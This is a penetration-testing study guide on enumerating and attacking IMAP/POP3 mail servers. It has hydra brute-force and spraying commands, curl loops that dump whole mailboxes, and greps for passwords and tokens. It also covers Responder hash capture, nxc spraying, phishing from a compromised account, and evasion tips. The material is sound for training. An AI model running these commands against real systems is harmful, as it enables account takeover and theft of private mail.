Skip to Content
Red Teaming01-ReconService enumerationIMAP/POP3 - 143/993, 110/995

IMAP / POP3 - Ports 143, 993, 110, 995

Cheatsheet

# Nmap service detection + capability/NTLM scripts nmap -sV -sC -p110,143,993,995 <IP> nmap --script imap-capabilities,pop3-capabilities -p143,110 <IP> nmap --script imap-ntlm-info,pop3-ntlm-info -p143,110 <IP> nc -nv <IP> 143 nc -nv <IP> 110 # IMAPs # manual interaction got em from https://donsutherland.org/crib/imap telnet target.com 143 # Encrypted connections openssl s_client -connect <IP>:993 -crlf -quiet A1 LOGIN <USER> <PASS> #login A2 LIST "" * #list all folders A3 LIST "INBOX" * #list inbox folder A4 SELECT "INBOX" #select inbox folder A5 UID SEARCH ALL #search all messages this will fetch uid with message ids A4 UID FETCH <UID> BODY[] #fetch full message A7 LOGOUT #logout # POP3 telnet <IP> 110 #encryted openssl s_client -connect <IP>:995 -crlf -quiet USER username PASS password APOP <name> <digest> # auth with MD5 digest instead of plaintext pass CAPA # Lists server-supported capabilities ## 2. Mailbox Status & Summary STAT # Returns total number of messages and total mailbox size LIST # Lists all message IDs with respective sizes in octets LIST <msg#> # Retrieves the size of a specific message (by number) UIDL # Lists unique IDs for all messages (track across sessions) ## 3. Retrieving & Reading Messages RETR <msg#> # Fetches the full content (headers + body) of the specified message TOP <msg#> <lines> # Fetches message headers and <lines> of body (partial preview) ## 4. Deletion & Session Management DELE <msg#> # Marks a message for deletion (deleted after QUIT) RSET # Undoes any message deletions for the session NOOP # Sends a keepalive/no-operation command QUIT # Ends session and deletes messages marked with DELE # Credential attacks (spray harvested creds first, brute last) hydra -L users.txt -P passwords.txt <IP> imap hydra -L users.txt -P passwords.txt <IP> imaps -s 993 hydra -L users.txt -P passwords.txt <IP> pop3 hydra -L users.txt -P passwords.txt <IP> pop3s -s 995 # cURL fast bulk read (IMAP) curl -k 'imaps://<IP>' --user <USER>:<PASS> curl -k 'imaps://<IP>/INBOX;UID=1' --user <USER>:<PASS> curl -k 'imaps://<IP>/INBOX?SUBJECT password' --user <USER>:<PASS> # cURL POP3 curl -k 'pop3s://<IP>' --user <USER>:<PASS> curl -k 'pop3s://<IP>/1' --user <USER>:<PASS> # Dump every message in INBOX (IMAP via cURL loop) for i in $(seq 1 100); do curl -k "imaps://<IP>/INBOX;UID=$i" --user <USER>:<PASS>; done > emails.txt # Dump POP3 messages for i in $(seq 1 100); do curl -k "pop3s://<IP>/$i" --user <USER>:<PASS>; done > emails.txt # Capture relayed Net-NTLMv2 if NTLM auth is in play sudo responder -I <INTERFACE>

Methodology

The value of mail services is the contents of the mailbox, not the protocol. Emails routinely contain plaintext credentials, password-reset links, internal hostnames, VPN configs, and sensitive attachments. Pair IMAP/POP3 with SMTP user discovery for the highest yield SMTP hands you the usernames, IMAP/POP3 lets you read what those users received. Every credential found in a mailbox is sprayed against every other service.

Phase 1: Fingerprint and Capabilities

?

Ask youself

  • What mail server and version answers on 143/110, and are the TLS ports 993/995 also open?
  • Which auth mechanisms does CAPABILITY / CAPA advertise (LOGINDISABLED, STARTTLS, AUTH=PLAIN, AUTH=NTLM, APOP)?
  • Does NTLM auth leak the hostname and AD domain pre-auth?
  • Are only cleartext ports open, meaning credential exchange is sniffable?
  • Are there known CVEs for this exact server version?
  • Does the banner differ from what Nmap reports ? could the service be proxied or version-spoofed?
nmap -sV -sC -p110,143,993,995 <IP> # List accepted auth mechanisms (LOGINDISABLED, STARTTLS, AUTH=PLAIN, AUTH=NTLM, APOP) nmap --script imap-capabilities -p143 <IP> nmap --script pop3-capabilities -p110 <IP> # Pre-auth NTLM info disclosure (hostname, NetBIOS/DNS domain, OS build) nmap --script imap-ntlm-info -p143 <IP> nmap --script pop3-ntlm-info -p110 <IP> # All IMAP/POP3 scripts at once nmap -p 143,993,110,995 --script "imap-* or pop3-*" <IP>
  • nmap -sV -sC -p110,143,993,995 <IP> : detect software and version. Common targets: Dovecot, Courier, Cyrus, Exchange, hMailServer. Confirm whether TLS ports (993/995) are reachable.
  • nc -nv <IP> 143 / nc -nv <IP> 110 : manual banner grab. Most servers leak the exact product and version in the greeting line.
  • Compare the banner from netcat with Nmap’s -sV detection : mismatches may indicate a proxy, custom banner, or version spoofing.
  • nmap --script imap-capabilities -p143 <IP> : list IMAP capabilities. LOGINDISABLED means auth is blocked on this port (only TLS accepted); STARTTLS allows encryption upgrade; AUTH=PLAIN/AUTH=NTLM reveal accepted mechanisms.
  • nmap --script pop3-capabilities -p110 <IP> : same for POP3. USER, APOP, SASL reveal accepted auth methods; STLS means STARTTLS is supported.
  • nmap --script imap-ntlm-info -p143 <IP> (and pop3-ntlm-info) : if NTLM auth is supported, this discloses hostname, NetBIOS name, DNS domain, and OS build without credentials. Free AD-enumeration win.
  • searchsploit dovecot / cyrus imap , check the exact version against public exploits.

Phase 2: Credential Attacks

?

Ask youself

  • Which harvested credentials (SMTP-enumerated users, FTP, web, LDAP, DB) should I spray?
  • What lockout policy applies (especially AD-backed Exchange) before I spray?
  • Should I target the cleartext or TLS port to balance reliability against sniffability?
  • If NTLM auth is offered, can I capture or relay Net-NTLMv2 instead of guessing?
  • Can I enumerate valid users via differential error responses on POP3 USER commands?
# Spray harvested credentials first (mail = highest reuse rate) hydra -L users.txt -P passwords.txt <IP> imap hydra -L users.txt -P passwords.txt <IP> pop3 # TLS-wrapped ports hydra -L users.txt -P passwords.txt <IP> imaps -s 993 hydra -L users.txt -P passwords.txt <IP> pop3s -s 995 # Nmap brute-force scripts nmap -p 143 --script imap-brute <IP> nmap -p 110 --script pop3-brute <IP> # POP3 user enumeration via error response differences # +OK vs -ERR after USER command may reveal valid usernames telnet <IP> 110 # Capture relayed Net-NTLMv2 if NTLM auth is in play sudo responder -I <INTERFACE>
  • Spray credentials harvested elsewhere first SMTP-enumerated usernames, web app accounts, FTP creds, LDAP binds, DB passwords. Mail accounts are the #1 reuse target.
  • hydra -L users.txt -P passwords.txt <IP> imap / ... pop3 brute force cleartext ports. A successful login returns the account and password.
  • hydra ... imaps -s 993 / ... pop3s -s 995 target TLS ports when only those are open, or to avoid sending credentials in cleartext.
  • Try lazy combos: username:username, username:Welcome1, username:Password123. Bulk-created mail accounts often share trivially predictable initial passwords.
  • POP3 user enumeration: some servers respond differently to valid vs invalid usernames on the USER command (+OK vs -ERR). Additionally, valid users may cause a measurable timing difference before the password prompt.
  • If AUTH=NTLM is offered, sudo responder -I <INTERFACE> can capture relayed Net-NTLMv2 crack offline or relay.

OPSEC: Failed mail logins land in /var/log/dovecot.log, /var/log/maillog, and SIEM forwarders. AD-backed servers (Exchange) lock out after 5-10 failures. Use targeted spraying small username lists, common passwords, slow rate never a full wordlist blast.

Phase 3: Read and Pillage Emails

?

Ask youself

  • Which folders exist beyond INBOX (Sent, Drafts, Trash, Junk, Archive, custom)?
  • What high-signal keywords surface credentials and reset links fastest?
  • Am I reading non-destructively, or risking POP3 deleting messages on retrieval?
  • Which attachments (.ovpn, SSH keys, documents) are worth pulling in full?
  • What internal hostnames, IPs, and infrastructure details do the messages reveal?
  • Is the message count large enough to justify bulk extraction over interactive browsing?
# IMAP list folders, then search and fetch (non-destructive) a1 LOGIN <USER> <PASS> a2 LIST "" "*" a3 SELECT INBOX a4 STATUS INBOX (MESSAGES RECENT UNSEEN) a5 SEARCH BODY "password" a6 SEARCH SUBJECT "reset" a7 SEARCH FROM "admin" a8 SEARCH TEXT "confidential" a9 SEARCH SINCE 01-Jan-2024 a10 FETCH 1 BODY[] a11 LOGOUT
# POP3 enumerate and read (RSET before QUIT if you marked deletions) USER <USER> PASS <PASS> STAT LIST UIDL RETR 1 TOP 1 10 RSET QUIT
# cURL bulk extraction IMAP (fastest approach) curl -k 'imaps://<IP>' --user <USER>:<PASS> curl -k 'imaps://<IP>/INBOX;UID=1' --user <USER>:<PASS> for i in $(seq 1 100); do curl -k "imaps://<IP>/INBOX;UID=$i" --user <USER>:<PASS>; done > emails.txt # cURL bulk extraction POP3 for i in $(seq 1 100); do curl -k "pop3s://<IP>/$i" --user <USER>:<PASS> > email_$i.eml 2>/dev/null; done # Search downloaded emails for high-value strings grep -ri 'pass\|secret\|key\|token\|vpn\|credential' emails.txt grep -Eiorh 'https?://[^\s]+' *.eml grep -Eiorh '\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b' *.eml
  • IMAP: a LIST "" * then a SELECT <folder> enumerate and open every mailbox. Prefer IMAP over POP3: it is non-destructive and supports server-side SEARCH.
  • POP3: STATLISTRETR <N> POP3 has only INBOX and may delete on retrieval. Run RSET before QUIT if you accidentally DELE anything.
  • Check every folder, not just INBOX Sent (users mail credentials to themselves), Drafts, Trash (deleted reset emails), Junk, Archive, and custom folders.
  • Search high-signal keywords: SEARCH BODY "password", "vpn", "credential", SEARCH SUBJECT "reset", "temp", SEARCH FROM "admin", SEARCH TEXT "confidential". Each hit returns matching message UIDs to fetch.
  • Use SEARCH SINCE <date> for time-scoped results to find recent password resets or onboarding emails.
  • Bulk-dump with the cURL loop into .eml files, then grep -ri 'pass\|secret\|key\|token\|vpn' across them faster than reading interactively.
  • Extract URLs and email addresses from downloaded messages password-reset links, internal portals, and new contacts feed the next phase.

Phase 4: NTLM Hash Capture and Lateral Movement

?

Ask youself

  • Does CAPABILITY advertise AUTH=NTLM on this server?
  • Can I coax client mail traffic toward my interface to capture Net-NTLMv2?
  • What did the pre-auth NTLM info script already reveal about the domain?
  • Is the captured hash crackable, or better used in a relay?
  • Which services should the mailbox-sourced credentials hit first?
  • Do the same IMAP/POP3 creds authenticate to SMTP for outbound phishing?
  • Are VPN configs or SSH keys in the mail immediately usable for a pivot?
# Capture Net-NTLMv2 when NTLM auth is in play sudo responder -I <INTERFACE> # Re-pull the pre-auth NTLM info for domain/hostname context nmap --script imap-ntlm-info -p143 <IP> # Build a creds file from mailbox findings, spray everywhere nxc ssh <IP> -u users.txt -p creds.txt nxc smb <IP> -u users.txt -p creds.txt nxc winrm <IP> -u users.txt -p creds.txt
  • Confirm AUTH=NTLM in the CAPABILITY output before expecting any NTLM material.
  • sudo responder -I <INTERFACE> capture Net-NTLMv2 if a misconfigured client authenticates to your host; crack with hashcat/john or relay with ntlmrelayx.
  • nmap --script imap-ntlm-info -p143 <IP> even with no creds, this discloses hostname, NetBIOS name, DNS domain, and OS version; feed these into LDAP/SMB enumeration.
  • Extract every credential from mailbox content into a fresh creds.txt spray against SSH, SMB, WinRM, RDP, databases, and web admin panels.
  • Try the same IMAP/POP3 creds against SMTP. If SMTP AUTH succeeds, send phishing from a real internal account that passes SPF/DKIM/DMARC.
  • If VPN configs (.ovpn) or SSH keys appear in attachments, connect and pivot to the internal network.
  • Test recent password-reset links they may still be valid. The password format (e.g. Welcome2025!) seeds sprays against other users.

Quiz

You crack a user's IMAP password and dump their mailbox. The INBOX is empty, but the Sent folder has an email from the user to themselves, subject 'creds backup', listing usernames/passwords for SSH, MySQL, and a WordPress admin panel. What's your priority order?

Reference

Protocol Overview

ProtocolPortEncryptionPurpose
IMAP143/TCPNoneEmail access messages stay on the server, supports folders and server-side search
IMAPS993/TCPTLS/SSLEncrypted IMAP
POP3110/TCPNoneEmail download messages typically removed from the server after retrieval
POP3S995/TCPTLS/SSLEncrypted POP3

IMAP (Internet Message Access Protocol) is a standard email protocol that stores email messages on a mail server and allows the end user to view and manipulate them as though they were stored locally. Unlike POP3, IMAP synchronizes email across multiple devices and allows management of email directly on the server folder hierarchies, search, partial fetches, and flags are all server-side operations.

POP3 (Post Office Protocol version 3) retrieves emails from a remote server to a local client. It typically downloads messages and deletes them from the server (configurable). POP3 is simpler than IMAP but less feature-rich designed primarily for offline email access with no folder concept, no server-side search, and only an INBOX view.

Always prefer IMAP when both are available. POP3 has no folder concept (only INBOX), no server-side search, and may delete messages on retrieval. IMAP is non-destructive and supports SEARCH BODY queries that grep across years of email in one command.

Quick Reference

TaskCommand
Connect IMAP (telnet)telnet <IP> 143
Connect IMAP (netcat)nc -nv <IP> 143
Connect IMAPSopenssl s_client -connect <IP>:993 -crlf -quiet
Connect POP3 (telnet)telnet <IP> 110
Connect POP3 (netcat)nc -nv <IP> 110
Connect POP3Sopenssl s_client -connect <IP>:995 -crlf -quiet
Nmap scan all portsnmap -sV -sC -p110,143,993,995 <IP>
NTLM info (IMAP)nmap --script imap-ntlm-info -p143 <IP>
NTLM info (POP3)nmap --script pop3-ntlm-info -p110 <IP>
Brute force IMAPhydra -L users.txt -P passwords.txt <IP> imap
Brute force POP3hydra -L users.txt -P passwords.txt <IP> pop3
cURL list IMAP folderscurl -k 'imaps://<IP>' --user <USER>:<PASS>
cURL fetch IMAP emailcurl -k 'imaps://<IP>/INBOX;UID=1' --user <USER>:<PASS>
cURL list POP3 messagescurl -k 'pop3s://<IP>' --user <USER>:<PASS>
cURL fetch POP3 emailcurl -k 'pop3s://<IP>/1' --user <USER>:<PASS>

IMAP Commands

CommandDescription
a CAPABILITYList server capabilities and auth mechanisms
a LOGIN <USER> <PASS>Authenticate
a LIST "" *List all mailboxes/folders
a SELECT INBOXOpen a mailbox for reading
a STATUS INBOX (MESSAGES RECENT UNSEEN)Check mailbox stats without selecting
a SEARCH ALLGet all message UIDs
a SEARCH BODY "password"Search email bodies for a keyword
a SEARCH SUBJECT "reset"Search subjects
a SEARCH FROM "admin"Search by sender
a SEARCH TEXT "confidential"Full-text search (headers + body)
a SEARCH SINCE 01-Jan-2024Date-scoped search
a FETCH 1 BODY[]Fetch full message (headers + body)
a FETCH 1 BODY[HEADER]Fetch headers only
a FETCH 1 BODY[TEXT]Fetch body only
a FETCH 1:* (BODY[])Fetch all messages
a STORE 1 +FLAGS (\Deleted)Mark for deletion
a EXPUNGEPermanently delete marked messages
a LOGOUTEnd session

The prefix (a, a1, b, etc.) is a tag for matching responses to commands the server echoes it back. It can be any short, consistent string; it is not a sequence counter.

POP3 Commands

CommandDescription
USER <USER>Specify username
PASS <PASS>Authenticate
STATMailbox stats (message count, total size)
LISTList all messages with sizes
RETR <N>Retrieve message N in full
TOP <N> <LINES>Get headers + first N lines of message N
DELE <N>Mark message N for deletion
UIDLList unique message IDs
CAPAList server capabilities
NOOPNo operation (keep connection alive)
RSETUndo all deletions in this session
QUITEnd session (commits deletions)

QUIT commits any DELE operations from the session. If you accidentally mark messages for deletion during enumeration, run RSET before quitting otherwise you destroy evidence and tip off the user that someone was in the mailbox.

Pass-the-Hash via NTLM

When NTLM authentication is supported on IMAP/POP3, password hashes can potentially be used instead of plaintext passwords. Verify NTLM support first:

nmap -p 143 --script imap-ntlm-info <IP>

If the server advertises AUTH=NTLM, captured Net-NTLMv2 hashes can be cracked offline with hashcat (-m 5600) or relayed to other services with ntlmrelayx.

Common Mistakes

  • Only reading INBOX Sent, Drafts, and Trash are where users stash credentials and forgotten reset emails. Enumerate every folder with LIST "" *.
  • Forgetting RSET on POP3 a stray DELE plus QUIT permanently deletes mail, destroys evidence, and tips off the user.
  • Brute forcing before spraying harvested creds mail accounts have the highest reuse rate; try known credentials and lazy combos before any wordlist blast.
  • Skipping CAPABILITY / CAPA guessing passwords against an auth mechanism the server rejects wastes time and noise. Read capabilities first.
  • Not recycling mailbox creds every password found in mail must be sprayed against SSH, SMB, WinRM, RDP, databases, and SMTP immediately.
  • Ignoring the cleartext-vs-TLS choice authenticating on 143/110 when 993/995 exist exposes credentials to anyone sniffing the wire.
  • Missing POP3 user enumeration differential error responses on USER commands may reveal valid usernames without ever needing a password.

Quiz

You read through a user's INBOX and find a password reset email from two weeks ago. The temporary password is `Welcome2024!`. Is this useful?

#PenetrationTesting #RedTeam #Certification #Linux #Windows #IMAP #POP3 #EmailEnum #ServiceEnum #Hydra #Brute-Force #NTLM #CredentialSpraying #Mail #Responder

Last updated on